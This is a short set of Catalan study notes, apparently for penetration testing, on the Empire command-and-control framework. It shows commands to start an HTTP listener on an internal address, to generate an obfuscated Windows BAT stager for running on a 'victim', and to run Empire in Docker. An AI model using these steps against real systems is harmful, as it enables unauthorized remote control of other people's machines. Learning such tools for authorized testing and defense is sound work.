Empire

#+KEYWORDS:

Instal·lació i configuració

Ús

NOTA: recordar sempre que amb TAB tenim l'auto-completar.

Listeners

Els listeners son la part servidor de EMPIRE on tindrem un servei esperant i "escoltant" a que els clients infectats s'hi connectin. En tenim de varis tipus:

  • dbx:
  • http:
  • http~com~:
  • http~foreign~:
  • http~hop~:
  • http~mapi~:
  • meterpreter:
  • redirector:
  • onedrive:

Creació

Un cop triat el tipus, per exemple http, executem:

uselistener http

Dins podem utilitzar la comanda info per veure els paràmetres que podem configurar del listener.

info

Amb la comanda set podem establir els valors de cada paràmetre, especialment Host.

set Name proves
set Host http://10.50.13.13

I amb la comanda execute llançarem el listener.

execute

Stagers

Un stager combina el vector d'infecció amb el payload de manera que crearem un arxiu o codi que s'haurà d'executar a la víctima per a infectar-la. Normalment els arxius generats es guarden a tmp. Per cerar un stager farem servir usestager. Per exemple un que infecti mitjançat un BAT:

usestager windows/launcher_bat

Per veure les opcions disponible utilitzem les comandes info i set per modificar-ne els valors. Finalment amb execute crearem el stager.

info
set Listener proves
set Obfuscate true
execute

Agents

Dockerització

docker container run -it -p8080:8080 --name empire -v /root/tmp:/tmp/ empireproject/empire

Si el contenidor està parat:

docker container attach empire

Webgrafia